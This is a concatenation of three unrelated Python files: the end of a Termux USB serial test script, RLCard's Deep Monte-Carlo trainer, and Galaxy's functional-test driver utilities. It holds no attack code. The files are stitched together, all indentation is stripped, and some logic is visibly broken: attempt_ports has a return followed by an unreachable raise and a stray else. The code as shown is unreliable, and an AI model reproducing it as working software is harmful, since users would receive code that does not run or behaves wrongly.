# tr = threading.Thread(target=buf_read_util2, args=(10.0 / 1000.0, b"\n", None, None))
tw = threading.Thread(target=writer, args=(1000.0 / 1000.0,))
tr.start()
tw.start()
# ser._buf_out.write(b"test\n")
# time.sleep(1)
# ser._buf_out.write(b"test 1\n")
# time.sleep(1)
# ser._buf_out.write(b"test 2\n")
# time.sleep(1)
try:
time.sleep(30)
except KeyboardInterrupt:
pass
stop = True
tw.join()
tr.join()
print("test done")
if __name__ == "__main__":
# https://wiki.termux.com/wiki/Termux-usb
logging.basicConfig(
level=logging.INFO, format="[%(levelname).1s] %(name)s: %(message)s"
)
logging.getLogger(__name__).setLevel(logging.DEBUG)
logging.getLogger("usblib").setLevel(logging.DEBUG)
logging.getLogger("usblib.RXTX").setLevel(logging.INFO)
logging.getLogger("usb").setLevel(logging.DEBUG)
# grab fd number from args
# (from termux wrapper)
import sys
LOGGER.debug("args: %s", sys.argv)
fd = int(sys.argv[1])
main(fd)
|
trainer.py | # Copyright 2021 RLCard Team of Texas A&M University
# Copyright 2021 DouZero Team of Kwai
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import threading
import time
import timeit
import pprint
from collections import deque
import torch
from torch import multiprocessing as mp
from torch import nn
from .file_writer import FileWriter
from .model import DMCModel
from .utils import get_batch, create_buffers, create_optimizers, act, log
def compute_loss(logits, targets):
loss = ((logits - targets)**2).mean()
return loss
def learn(position,
actor_models,
agent,
batch,
optimizer,
training_device,
max_grad_norm,
mean_episode_return_buf,
lock):
"""Performs a learning (optimization) step."""
device = torch.device('cpu')
state = torch.flatten(batch['state'].to(device), 0, 1).float()
action = torch.flatten(batch['action'].to(device), 0, 1).float()
target = torch.flatten(batch['target'].to(device), 0, 1)
episode_returns = batch['episode_return'][batch['done']]
mean_episode_return_buf[position].append(torch.mean(episode_returns).to(device))
with lock:
values = agent.forward(state, action)
loss = compute_loss(values, target)
stats = {
'mean_episode_return_'+str(position): torch.mean(torch.stack([_r for _r in mean_episode_return_buf[position]])).item(),
'loss_'+str(position): loss.item(),
}
optimizer.zero_grad()
loss.backward()
nn.utils.clip_grad_norm_(agent.parameters(), max_grad_norm)
optimizer.step()
for actor_model in actor_models:
actor_model.get_agent(position).load_state_dict(agent.state_dict())
return stats
class DMCTrainer:
def __init__(self,
env,
load_model=False,
xpid='dmc',
save_interval=30,
num_actor_devices=1,
num_actors = 5,
training_device=0,
savedir='experiments/dmc_result',
total_frames=100000000000,
exp_epsilon=0.01,
batch_size=32,
unroll_length=100,
num_buffers=50,
num_threads=4,
max_grad_norm=40,
learning_rate=0.0001,
alpha=0.99,
momentum=0,
epsilon=0.00001):
'''
Deep Monte-Carlo
Args:
env: RLCard environment
load_model (boolean): Whether loading an existing model
xpid (string): Experiment id (default: dmc)
save_interval (int): Time interval (in minutes) at which to save the model
num_actor_devices (int): The number devices used for simulation
num_actors (int): Number of actors for each simulation device
training_device (int): The index of the GPU used for training models
savedir (string): Root dir where experiment data will be saved
total_frames (int): Total environment frames to train for
exp_epsilon (float): The prbability for exploration
batch_size (int): Learner batch size
unroll_length (int): The unroll length (time dimension)
num_buffers (int): Number of shared-memory buffers
num_threads (int): Number learner threads
max_grad_norm (int): Max norm of gradients
learning_rate (float): Learning rate
alpha (float): RMSProp smoothing constant
momentum (float): RMSProp momentum
epsilon (float): RMSProp epsilon
'''
self.env = env
self.plogger = FileWriter(
xpid=xpid,
rootdir=savedir,
)
self.checkpointpath = os.path.expandvars(
os.path.expanduser('%s/%s/%s' % (savedir, xpid, 'model.tar')))
self.T = unroll_length
self.B = batch_size
self.xpid = xpid
self.load_model = load_model
self.savedir = savedir
self.save_interval = save_interval
self.num_actor_devices = num_actor_devices
self.num_actors = num_actors
self.training_device = training_device
self.total_frames = total_frames
self.exp_epsilon = exp_epsilon
self.num_buffers = num_buffers
self.num_threads = num_threads
self.max_grad_norm = max_grad_norm
self.learning_rate =learning_rate
self.alpha = alpha
self.momentum = momentum
self.epsilon = epsilon
self.action_shape = self.env.action_shape
if self.action_shape[0] == None: # One-hot encoding
self.action_shape = [[self.env.num_actions] for _ in range(self.env.num_players)]
self.mean_episode_return_buf = [deque(maxlen=100) for _ in range(self.env.num_players)]
def start(self):
# Initialize actor models
models = []
for device in range(self.num_actor_devices):
model = DMCModel(self.env.state_shape,
self.action_shape,
exp_epsilon=self.exp_epsilon,
device=device)
model.share_memory()
model.eval()
models.append(model)
# Initialize buffers
buffers = create_buffers(self.T,
self.num_buffers,
self.env.state_shape,
self.action_shape)
# Initialize queues
actor_processes = []
ctx = mp.get_context('spawn')
free_queue = []
full_queue = []
for device in range(self.num_actor_devices):
_free_queue = [ctx.SimpleQueue() for _ in range(self.env.num_players)]
_full_queue = [ctx.SimpleQueue() for _ in range(self.env.num_players)]
free_queue.append(_free_queue)
full_queue.append(_full_queue)
# Learner model for training
learner_model = DMCModel(self.env.state_shape,
self.action_shape,
device=self.training_device)
# Create optimizers
optimizers = create_optimizers(self.env.num_players,
self.learning_rate,
self.momentum,
self.epsilon,
self.alpha,
learner_model)
# Stat Keys
stat_keys = []
for p in range(self.env.num_players):
stat_keys.append('mean_episode_return_'+str(p))
stat_keys.append('loss_'+str(p))
frames, stats = 0, {k: 0 for k in stat_keys}
# Load models if any
if self.load_model and os.path.exists(self.checkpointpath):
checkpoint_states = torch.load(
self.checkpointpath, map_location="cuda:"+str(self.training_device)
)
for p in range(self.env.num_players):
learner_model.get_agent(p).load_state_dict(checkpoint_states["model_state_dict"][p])
optimizers[p].load_state_dict(checkpoint_states["optimizer_state_dict"][p])
for device in range(self.num_actor_devices):
models[device].get_agent(p).load_state_dict(learner_model.get_agent(p).state_dict())
stats = checkpoint_states["stats"]
frames = checkpoint_states["frames"]
log.info(f"Resuming preempted job, current stats:\n{stats}")
# Starting actor processes
for device in range(self.num_actor_devices):
num_actors = self.num_actors
for i in range(self.num_actors):
actor = ctx.Process(
target=act,
args=(i, device, self.T, free_queue[device], full_queue[device], models[device], buffers[device], self.env))
actor.start()
actor_processes.append(actor)
def batch_and_learn(i, device, position, local_lock, position_lock, lock=threading.Lock()):
"""Thread target for the learning process."""
nonlocal frames, stats
while frames < self.total_frames:
batch = get_batch(free_queue[device][position], full_queue[device][position], buffers[device][position], self.B, local_lock)
_stats = learn(position, models, learner_model.get_agent(position), batch,
optimizers[position], self.training_device, self.max_grad_norm, self.mean_episode_return_buf, position_lock)
with lock:
for k in _stats:
stats[k] = _stats[k]
to_log = dict(frames=frames)
to_log.update({k: stats[k] for k in stat_keys})
self.plogger.log(to_log)
frames += self.T * self.B
for device in range(self.num_actor_devices):
for m in range(self.num_buffers):
for p in range(self.env.num_players):
free_queue[device][p].put(m)
threads = []
locks = [[threading.Lock() for _ in range(self.env.num_players)] for _ in range(self.num_actor_devices)]
position_locks = [threading.Lock() for _ in range(self.env.num_players)]
for device in range(self.num_actor_devices):
for i in range(self.num_threads):
for position in range(self.env.num_players):
thread = threading.Thread(
target=batch_and_learn, name='batch-and-learn-%d' % i, args=(i,device,position,locks[device][position],position_locks[position]))
thread.start()
threads.append(thread)
def checkpoint(frames):
log.info('Saving checkpoint to %s', self.checkpointpath)
_agents = learner_model.get_agents()
torch.save({
'model_state_dict': [_agent.state_dict() for _agent in _agents],
'optimizer_state_dict': [optimizer.state_dict() for optimizer in optimizers],
"stats": stats,
'frames': frames,
}, self.checkpointpath)
# Save the weights for evaluation purpose
for position in range(self.env.num_players):
model_weights_dir = os.path.expandvars(os.path.expanduser(
'%s/%s/%s' % (self.savedir, self.xpid, str(position)+'_'+str(frames)+'.pth')))
torch.save(learner_model.get_agent(position), model_weights_dir)
timer = timeit.default_timer
try:
last_checkpoint_time = timer() - self.save_interval * 60
while frames < self.total_frames:
start_frames = frames
start_time = timer()
time.sleep(5)
if timer() - last_checkpoint_time > self.save_interval * 60:
checkpoint(frames)
last_checkpoint_time = timer()
end_time = timer()
fps = (frames - start_frames) / (end_time - start_time)
log.info('After %i frames: @ %.1f fps Stats:\n%s',
frames,
fps,
pprint.pformat(stats))
except KeyboardInterrupt:
return
else:
for thread in threads:
thread.join()
log.info('Learning finished after %d frames.', frames)
checkpoint(frames)
plogger.close()
|
driver_util.py | """Scripts for drivers of Galaxy functional tests."""
import http.client
import logging
import os
import random
import re
import shlex
import shutil
import signal
import socket
import string
import subprocess
import sys
import tempfile
import threading
import time
from typing import Optional
from urllib.parse import urlparse
import nose.config
import nose.core
import nose.loader
import nose.plugins.manager
import yaml
from paste import httpserver
from galaxy.app import UniverseApplication as GalaxyUniverseApplication
from galaxy.app_unittest_utils.celery_helper import rebind_container_to_task
from galaxy.config import LOGGING_CONFIG_DEFAULT
from galaxy.model import mapping
from galaxy.model.database_utils import create_database, database_exists
from galaxy.model.tool_shed_install import mapping as toolshed_mapping
from galaxy.tool_util.verify.interactor import GalaxyInteractorApi, verify_tool
from galaxy.util import asbool, download_to_file, galaxy_directory
from galaxy.util.properties import load_app_properties
from galaxy.webapps.galaxy import buildapp
from galaxy_test.base.api_util import get_admin_api_key, get_user_api_key
from galaxy_test.base.env import (
DEFAULT_WEB_HOST,
target_url_parts,
)
from galaxy_test.base.instrument import StructuredTestDataPlugin
from galaxy_test.base.nose_util import run
from tool_shed.webapp.app import UniverseApplication as ToolshedUniverseApplication
from .test_logging import logging_config_file
galaxy_root = galaxy_directory()
DEFAULT_CONFIG_PREFIX = "GALAXY"
GALAXY_TEST_DIRECTORY = os.path.join(galaxy_root, "test")
GALAXY_TEST_FILE_DIR = "test-data,https://github.com/galaxyproject/galaxy-test-data.git"
TOOL_SHED_TEST_DATA = os.path.join(galaxy_root, "lib", "tool_shed", "test", "test_data")
TEST_WEBHOOKS_DIR = os.path.join(galaxy_root, "test", "functional", "webhooks")
FRAMEWORK_TOOLS_DIR = os.path.join(GALAXY_TEST_DIRECTORY, "functional", "tools")
FRAMEWORK_UPLOAD_TOOL_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "upload_tool_conf.xml")
FRAMEWORK_SAMPLE_TOOLS_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "samples_tool_conf.xml")
FRAMEWORK_DATATYPES_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "sample_datatypes_conf.xml")
MIGRATED_TOOL_PANEL_CONFIG = 'config/migrated_tools_conf.xml'
INSTALLED_TOOL_PANEL_CONFIGS = [
os.environ.get('GALAXY_TEST_SHED_TOOL_CONF', 'config/shed_tool_conf.xml')
]
REALTIME_PROXY_TEMPLATE = string.Template(r"""
uwsgi:
http-raw-body: true
interactivetools_map: $tempdir/interactivetools_map.sqlite
python-raw: scripts/interactivetools/key_type_token_mapping.py
# if interactive tool path, jump to interactive tool, else skip to
# endendend (default uwsgi params).
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ goto:interactivetool
route-run: goto:endendend
route-label: interactivetool
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ rpcvar:TARGET_HOST rtt_key_type_token_mapper_cached $1 $3 $2 $4 $0 5
route-if-not: empty:${TARGET_HOST} httpdumb:${TARGET_HOST}
route: .* break:404 Not Found
route-label: endendend
""")
DEFAULT_LOCALES = "en"
USE_UVICORN = asbool(os.environ.get('GALAXY_TEST_USE_UVICORN', True))
log = logging.getLogger("test_driver")
# Global variables to pass database contexts around - only needed for older
# Tool Shed twill tests that didn't utilize the API for such interactions.
galaxy_context = None
tool_shed_context = None
install_context = None
def setup_tool_shed_tmp_dir():
tool_shed_test_tmp_dir = os.environ.get('TOOL_SHED_TEST_TMP_DIR', None)
if tool_shed_test_tmp_dir is None:
tool_shed_test_tmp_dir = os.path.realpath(tempfile.mkdtemp())
# Here's the directory where everything happens. Temporary directories are created within this directory to contain
# the hgweb.config file, the database, new repositories, etc. Since the tool shed browses repository contents via HTTP,
# the full path to the temporary directroy wher eht repositories are located cannot contain invalid url characters.
os.environ['TOOL_SHED_TEST_TMP_DIR'] = tool_shed_test_tmp_dir
return tool_shed_test_tmp_dir
def get_galaxy_test_tmp_dir():
"""Create test directory for use by Galaxy server being setup for testing."""
galaxy_test_tmp_dir = os.environ.get('GALAXY_TEST_TMP_DIR', None)
if galaxy_test_tmp_dir is None:
galaxy_test_tmp_dir = tempfile.mkdtemp()
return galaxy_test_tmp_dir
def configure_environment():
"""Hack up environment for test cases."""
# no op remove if unused
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ['HTTP_ACCEPT_LANGUAGE'] = DEFAULT_LOCALES
# Used by get_filename in tool shed's twilltestcase.
if "TOOL_SHED_TEST_FILE_DIR" not in os.environ:
os.environ["TOOL_SHED_TEST_FILE_DIR"] = TOOL_SHED_TEST_DATA
os.environ["GALAXY_TEST_ENVIRONMENT_CONFIGURED"] = "1"
def build_logger():
"""Build a logger for test driver script."""
return log
def ensure_test_file_dir_set():
"""Ensure GALAXY_TEST_FILE_DIR setup in environment for test data resolver.
Return first directory for backward compat.
"""
galaxy_test_file_dir = os.environ.get('GALAXY_TEST_FILE_DIR', GALAXY_TEST_FILE_DIR)
os.environ['GALAXY_TEST_FILE_DIR'] = galaxy_test_file_dir
first_test_file_dir = galaxy_test_file_dir.split(",")[0]
return first_test_file_dir
def setup_galaxy_config(
tmpdir,
use_test_file_dir=False,
default_install_db_merged=True,
default_tool_data_table_config_path=None,
default_shed_tool_data_table_config=None,
default_job_config_file=None,
enable_tool_shed_check=False,
default_tool_conf=None,
shed_tool_conf=None,
datatypes_conf=None,
update_integrated_tool_panel=False,
prefer_template_database=False,
log_format=None,
conda_auto_init=False,
conda_auto_install=False,
use_shared_connection_for_amqp=False,
allow_tool_conf_override: bool = True,
allow_path_paste=False,
):
"""Setup environment and build config for test Galaxy instance."""
# For certain docker operations this needs to be evaluated out - e.g. for cwltool.
tmpdir = os.path.realpath(tmpdir)
if not os.path.exists(tmpdir):
os.makedirs(tmpdir)
template_cache_path = tempfile.mkdtemp(prefix='compiled_templates_', dir=tmpdir)
new_file_path = tempfile.mkdtemp(prefix='new_files_path_', dir=tmpdir)
job_working_directory = tempfile.mkdtemp(prefix='job_working_directory_', dir=tmpdir)
user_library_import_dir: Optional[str]
if use_test_file_dir:
first_test_file_dir = ensure_test_file_dir_set()
if not os.path.isabs(first_test_file_dir):
first_test_file_dir = os.path.join(galaxy_root, first_test_file_dir)
library_import_dir = first_test_file_dir
import_dir = os.path.join(first_test_file_dir, 'users')
if os.path.exists(import_dir):
user_library_import_dir = import_dir
else:
user_library_import_dir = None
else:
user_library_import_dir = None
library_import_dir = None
job_config_file = os.environ.get('GALAXY_TEST_JOB_CONFIG_FILE', default_job_config_file)
tool_path = os.environ.get('GALAXY_TEST_TOOL_PATH', 'tools')
tool_data_table_config_path = _tool_data_table_config_path(default_tool_data_table_config_path)
default_data_manager_config = None
for data_manager_config in ['config/data_manager_conf.xml', 'data_manager_conf.xml']:
if os.path.exists(data_manager_config):
default_data_manager_config = data_manager_config
data_manager_config_file = 'test/functional/tools/sample_data_manager_conf.xml'
if default_data_manager_config is not None:
data_manager_config_file = f"{default_data_manager_config},{data_manager_config_file}"
master_api_key = get_admin_api_key()
cleanup_job = 'never' if ("GALAXY_TEST_NO_CLEANUP" in os.environ
or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ) else 'onsuccess'
# Data Manager testing temp path
# For storing Data Manager outputs and .loc files so that real ones don't get clobbered
galaxy_data_manager_data_path = tempfile.mkdtemp(prefix='data_manager_tool-data', dir=tmpdir)
if allow_tool_conf_override:
tool_conf = os.environ.get('GALAXY_TEST_TOOL_CONF', default_tool_conf)
else:
tool_conf = default_tool_conf
conda_auto_install = os.environ.get('GALAXY_TEST_CONDA_AUTO_INSTALL', conda_auto_install)
conda_auto_init = os.environ.get('GALAXY_TEST_CONDA_AUTO_INIT', conda_auto_init)
conda_prefix = os.environ.get('GALAXY_TEST_CONDA_PREFIX')
if tool_conf is None:
# As a fallback always at least allow upload.
tool_conf = FRAMEWORK_UPLOAD_TOOL_CONF
if shed_tool_conf is not None:
tool_conf = f"{tool_conf},{shed_tool_conf}"
# Resolve these paths w.r.t. galaxy root; otherwise galaxy's config system will resolve them w.r.t.
# their parent directories, as per schema.
data_manager_config_file = _resolve_relative_config_paths(data_manager_config_file)
tool_config_file = _resolve_relative_config_paths(tool_conf)
tool_data_table_config_path = _resolve_relative_config_paths(tool_data_table_config_path)
config = dict(
admin_users='test@bx.psu.edu',
allow_library_path_paste=True,
allow_path_paste=allow_path_paste,
allow_user_creation=True,
allow_user_deletion=True,
api_allow_run_as='test@bx.psu.edu',
auto_configure_logging=logging_config_file is None,
chunk_upload_size=100,
conda_prefix=conda_prefix,
conda_auto_init=conda_auto_init,
conda_auto_install=conda_auto_install,
cleanup_job=cleanup_job,
retry_metadata_internally=False,
data_dir=tmpdir,
data_manager_config_file=data_manager_config_file,
enable_beta_tool_formats=True,
expose_dataset_path=True,
ftp_upload_purge=False,
galaxy_data_manager_data_path=galaxy_data_manager_data_path,
id_secret='changethisinproductiontoo',
job_config_file=job_config_file,
job_working_directory=job_working_directory,
library_import_dir=library_import_dir,
log_destination="stdout",
new_file_path=new_file_path,
override_tempdir=False,
master_api_key=master_api_key,
running_functional_tests=True,
template_cache_path=template_cache_path,
tool_config_file=tool_config_file,
tool_data_table_config_path=tool_data_table_config_path,
tool_parse_help=False,
tool_path=tool_path,
update_integrated_tool_panel=update_integrated_tool_panel,
use_tasked_jobs=True,
use_heartbeat=False,
user_library_import_dir=user_library_import_dir,
webhooks_dir=TEST_WEBHOOKS_DIR,
logging=LOGGING_CONFIG_DEFAULT,
monitor_thread_join_timeout=5,
object_store_store_by="uuid",
simplified_workflow_run_ui="off",
)
if default_shed_tool_data_table_config:
config["shed_tool_data_table_config"] = default_shed_tool_data_table_config
if not use_shared_connection_for_amqp:
config["amqp_internal_connection"] = f"sqlalchemy+sqlite:///{os.path.join(tmpdir, 'control.sqlite')}?isolation_level=IMMEDIATE"
config.update(database_conf(tmpdir, prefer_template_database=prefer_template_database))
config.update(install_database_conf(tmpdir, default_merged=default_install_db_merged))
if asbool(os.environ.get("GALAXY_TEST_USE_HIERARCHICAL_OBJECT_STORE")):
object_store_config = os.path.join(tmpdir, "object_store_conf.yml")
with open(object_store_config, "w") as f:
contents = """
type: hierarchical
backends:
- id: files1
type: disk
weight: 1
files_dir: "${temp_directory}/files1"
extra_dirs:
- type: temp
path: "${temp_directory}/tmp1"
- type: job_work
path: "${temp_directory}/job_working_directory1"
- id: files2
type: disk
weight: 1
files_dir: "${temp_directory}/files2"
extra_dirs:
- type: temp
path: "${temp_directory}/tmp2"
- type: job_work
path: "${temp_directory}/job_working_directory2"
"""
contents_template = string.Template(contents)
expanded_contents = contents_template.safe_substitute(temp_directory=tmpdir)
f.write(expanded_contents)
config["object_store_config_file"] = object_store_config
if datatypes_conf is not None:
config['datatypes_config_file'] = datatypes_conf
if enable_tool_shed_check:
config["enable_tool_shed_check"] = enable_tool_shed_check
config["hours_between_check"] = 0.001
tool_dependency_dir = os.environ.get('GALAXY_TOOL_DEPENDENCY_DIR')
if tool_dependency_dir:
config["tool_dependency_dir"] = tool_dependency_dir
# Used by shed's twill dependency stuff
# TODO: read from Galaxy's config API.
os.environ["GALAXY_TEST_TOOL_DEPENDENCY_DIR"] = tool_dependency_dir or os.path.join(tmpdir, 'dependencies')
return config
def _resolve_relative_config_paths(config_option):
# If option is not None, split into paths, resolve each w.r.t. root, then rebuild as csv string.
if config_option is not None:
resolved = []
for path in config_option.split(','):
resolved.append(os.path.join(galaxy_root, path.strip()))
return ','.join(resolved)
def _tool_data_table_config_path(default_tool_data_table_config_path=None):
tool_data_table_config_path = os.environ.get('GALAXY_TEST_TOOL_DATA_TABLE_CONF', default_tool_data_table_config_path)
if tool_data_table_config_path is None:
# ... otherwise find whatever Galaxy would use as the default and
# the sample data for functional tests to that.
default_tool_data_config = 'lib/galaxy/config/sample/tool_data_table_conf.xml.sample'
for tool_data_config in ['config/tool_data_table_conf.xml', 'tool_data_table_conf.xml']:
if os.path.exists(tool_data_config):
default_tool_data_config = tool_data_config
test_tool_data_config = 'test/functional/tool-data/sample_tool_data_tables.xml'
tool_data_table_config_path = f'{default_tool_data_config},{test_tool_data_config}'
return tool_data_table_config_path
def nose_config_and_run(argv=None, env=None, ignore_files=None, plugins=None):
"""Setup a nose context and run tests.
Tests are specified by argv (defaulting to sys.argv).
"""
if env is None:
env = os.environ
if ignore_files is None:
ignore_files = []
if plugins is None:
plugins = nose.plugins.manager.DefaultPluginManager()
if argv is None:
argv = sys.argv
test_config = nose.config.Config(
env=os.environ,
ignoreFiles=ignore_files,
plugins=plugins,
)
# Add custom plugin to produce JSON data used by planemo.
test_config.plugins.addPlugin(StructuredTestDataPlugin())
test_config.configure(argv)
result = run(test_config)
success = result.wasSuccessful()
return success
def copy_database_template(source, db_path):
"""Copy a 'clean' sqlite template database.
From file or URL to specified path for sqlite database.
"""
db_path_dir = os.path.dirname(db_path)
if not os.path.exists(db_path_dir):
os.makedirs(db_path_dir)
if os.path.exists(source):
shutil.copy(source, db_path)
assert os.path.exists(db_path)
elif source.lower().startswith(("http://", "https://", "ftp://")):
try:
download_to_file(source, db_path)
except Exception as e:
# We log the exception but don't fail startup, since we can
# do all migration steps instead of downloading a template.
log.exception(e)
else:
raise Exception(f"Failed to copy database template from source {source}")
def database_conf(db_path, prefix="GALAXY", prefer_template_database=False):
"""Find (and populate if needed) Galaxy database connection."""
database_auto_migrate = False
check_migrate_databases = True
dburi_var = f"{prefix}_TEST_DBURI"
template_name = None
if dburi_var in os.environ:
database_connection = os.environ[dburi_var]
# only template if postgres - not mysql or sqlite
do_template = prefer_template_database and database_connection.startswith("p")
if do_template:
database_template_parsed = urlparse(database_connection)
template_name = database_template_parsed.path[1:] # drop / from /galaxy
actual_db = f"gxtest{''.join(random.choice(string.ascii_uppercase) for _ in range(10))}"
actual_database_parsed = database_template_parsed._replace(path=f"/{actual_db}")
database_connection = actual_database_parsed.geturl()
if not database_exists(database_connection):
# We pass by migrations and instantiate the current table
create_database(database_connection)
mapping.init('/tmp', database_connection, create_tables=True, map_install_models=True)
toolshed_mapping.init(database_connection, create_tables=True)
check_migrate_databases = False
else:
default_db_filename = f"{prefix.lower()}.sqlite"
template_var = f"{prefix}_TEST_DB_TEMPLATE"
db_path = os.path.join(db_path, default_db_filename)
if template_var in os.environ:
# Middle ground between recreating a completely new
# database and pointing at existing database with
# GALAXY_TEST_DBURI. The former requires a lot of setup
# time, the latter results in test failures in certain
# cases (namely tool shed tests expecting clean database).
copy_database_template(os.environ[template_var], db_path)
database_auto_migrate = True
database_connection = f'sqlite:///{db_path}'
config = {
"check_migrate_databases": check_migrate_databases,
"database_connection": database_connection,
"database_auto_migrate": database_auto_migrate
}
if not database_connection.startswith("sqlite://"):
config["database_engine_option_max_overflow"] = "20"
config["database_engine_option_pool_size"] = "10"
if template_name:
config["database_template"] = template_name
return config
def install_database_conf(db_path, default_merged=False):
install_galaxy_database_connection: Optional[str]
if 'GALAXY_TEST_INSTALL_DBURI' in os.environ:
install_galaxy_database_connection = os.environ['GALAXY_TEST_INSTALL_DBURI']
elif asbool(os.environ.get('GALAXY_TEST_INSTALL_DB_MERGED', default_merged)):
install_galaxy_database_connection = None
else:
install_galaxy_db_path = os.path.join(db_path, 'install.sqlite')
install_galaxy_database_connection = f'sqlite:///{install_galaxy_db_path}'
conf = {}
if install_galaxy_database_connection is not None:
conf["install_database_connection"] = install_galaxy_database_connection
return conf
def database_files_path(test_tmpdir, prefix="GALAXY"):
"""Create a mock database/ directory like in GALAXY_ROOT.
Use prefix to default this if TOOL_SHED_TEST_DBPATH or
GALAXY_TEST_DBPATH is set in the environment.
"""
environ_var = f"{prefix}_TEST_DBPATH"
if environ_var in os.environ:
db_path = os.environ[environ_var]
else:
tempdir = tempfile.mkdtemp(dir=test_tmpdir)
db_path = os.path.join(tempdir, 'database')
return db_path
def _get_static_settings():
"""Configuration required for Galaxy static middleware.
Returns dictionary of the settings necessary for a galaxy App
to be wrapped in the static middleware.
This mainly consists of the filesystem locations of url-mapped
static resources.
"""
static_dir = os.path.join(galaxy_root, "static")
# TODO: these should be copied from config/galaxy.ini
return dict(
static_enabled=True,
static_cache_time=360,
static_dir=static_dir,
static_images_dir=os.path.join(static_dir, 'images', ''),
static_favicon_dir=os.path.join(static_dir, 'favicon.ico'),
static_scripts_dir=os.path.join(static_dir, 'scripts', ''),
static_style_dir=os.path.join(static_dir, 'style'),
static_robots_txt=os.path.join(static_dir, 'robots.txt'),
)
def get_webapp_global_conf():
"""Get the global_conf dictionary sent to ``app_factory``."""
# (was originally sent 'dict()') - nothing here for now except static settings
global_conf = dict()
global_conf.update(_get_static_settings())
return global_conf
def wait_for_http_server(host, port, prefix=None, sleep_amount=0.1, sleep_tries=150):
"""Wait for an HTTP server to boot up."""
# Test if the server is up
prefix = prefix or '/'
if not prefix.endswith('/'):
prefix = f"{prefix}/"
for _ in range(sleep_tries):
# directly test the app, not the proxy
conn = http.client.HTTPConnection(host, port)
try:
conn.request("GET", prefix)
response = conn.getresponse()
if response.status == 200:
break
except OSError as e:
if e.errno not in [61, 111]:
raise
time.sleep(sleep_amount)
else:
template = "Test HTTP server on host %s and port %s did not return '200 OK' after 10 tries"
message = template % (host, port)
raise Exception(message)
def attempt_port(port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.bind(('', port))
sock.close()
return port
except OSError:
return None
def attempt_ports(port):
if port is not None:
return port
raise Exception(f"An existing process seems bound to specified test server port [{port}]")
else:
random.seed()
for _ in range(0, 9):
port = attempt_port(random.randint(8000, 10000))
if port:
port = str(port)
os.environ['GALAXY_WEB_PORT'] = port
return port
raise Exception(f"Unable to open a port between {8000} and {10000} to start Galaxy server")
def serve_webapp(webapp, port=None, host=None):
"""Serve the webapp on a recommend port or a free one.
Return the port the webapp is running on.
"""
server = None
port = attempt_ports(port)
server = httpserver.serve(webapp, host=host, port=port, start_loop=False)
t = threading.Thread(target=server.serve_forever)
t.start()
return server, port
def uvicorn_serve(app, port, host=None):
"""Serve the webapp on a recommend port or a free one.
Return the port the webapp is running on.
"""
import asyncio
from uvicorn.server import Server
from uvicorn.config import Config
access_log = False if 'GALAXY_TEST_DISABLE_ACCESS_LOG' in os.environ else True
config = Config(app, host=host, port=int(port), access_log=access_log)
server = Server(config=config)
def run_in_loop(loop):
try:
asyncio.set_event_loop(loop)
loop.run_until_complete(server.serve())
finally:
loop.close()
asyncio.set_event_loop(None)
log.info("Event loop for uvicorn closed")
loop = asyncio.new_event_loop()
t = threading.Thread(target=run_in_loop, args=(loop,))
t.start()
return server, port, t
def cleanup_directory(tempdir):
"""Clean up temporary files used by test unless GALAXY_TEST_NO_CLEANUP is set.
Also respect TOOL_SHED_TEST_NO_CLEANUP for legacy reasons.
"""
skip_cleanup = "GALAXY_TEST_NO_CLEANUP" in os.environ or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ
if skip_cleanup:
log.info(f"GALAXY_TEST_NO_CLEANUP is on. Temporary files in {tempdir}")
return
try:
if os.path.exists(tempdir) and not skip_cleanup:
shutil.rmtree(tempdir)
except Exception:
pass
def setup_shed_tools_for_test(app, tmpdir, testing_migrated_tools, testing_installed_tools):
"""Modify Galaxy app's toolbox for migrated or installed tool tests."""
if testing_installed_tools:
# TODO: Do this without modifying app - that is a pretty violation
# of Galaxy's abstraction - we shouldn't require app at all let alone
# be modifying it.
tool_configs = app.config.tool_configs
# Eliminate the migrated_tool_panel_config from the app's tool_configs, append the list of installed_tool_panel_configs,
# and reload the app's toolbox.
relative_migrated_tool_panel_config = os.path.join(app.config.root, MIGRATED_TOOL_PANEL_CONFIG)
if relative_migrated_tool_panel_config in tool_configs:
tool_configs.remove(relative_migrated_tool_panel_config)
for installed_tool_panel_config in INSTALLED_TOOL_PANEL_CONFIGS:
tool_configs.append(installed_tool_panel_config)
from galaxy import tools # delay import because this brings in so many modules for small tests # noqa: E402
app.toolbox = tools.ToolBox(tool_configs, app.config.tool_path, app)
def build_galaxy_app(simple_kwargs) -> GalaxyUniverseApplication:
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary and use load_app_properties so
Galaxy override variables are respected. Also setup "global" references
to sqlalchemy database context for Galaxy and install databases.
"""
log.info("Galaxy database connection: %s", simple_kwargs["database_connection"])
simple_kwargs['global_conf'] = get_webapp_global_conf()
simple_kwargs['global_conf']['__file__'] = "lib/galaxy/config/sample/galaxy.yml.sample"
simple_kwargs = load_app_properties(
kwds=simple_kwargs
)
# Build the Universe Application
app = GalaxyUniverseApplication(**simple_kwargs)
if not simple_kwargs.get("enable_celery_tasks"):
rebind_container_to_task(app)
log.info("Embedded Galaxy application started")
global galaxy_context
global install_context
galaxy_context = app.model.context
install_context = app.install_model.context
# Toolbox indexing happens via the work queue out of band recently, and,
# beyond potentially running async after tests execute doesn't execute
# without building a uwsgi app (app.is_webapp = False for this test kit).
# We need to ensure to build an index for the test galaxy app -- this is
# pretty fast with the limited toolset
app.reindex_tool_search()
return app
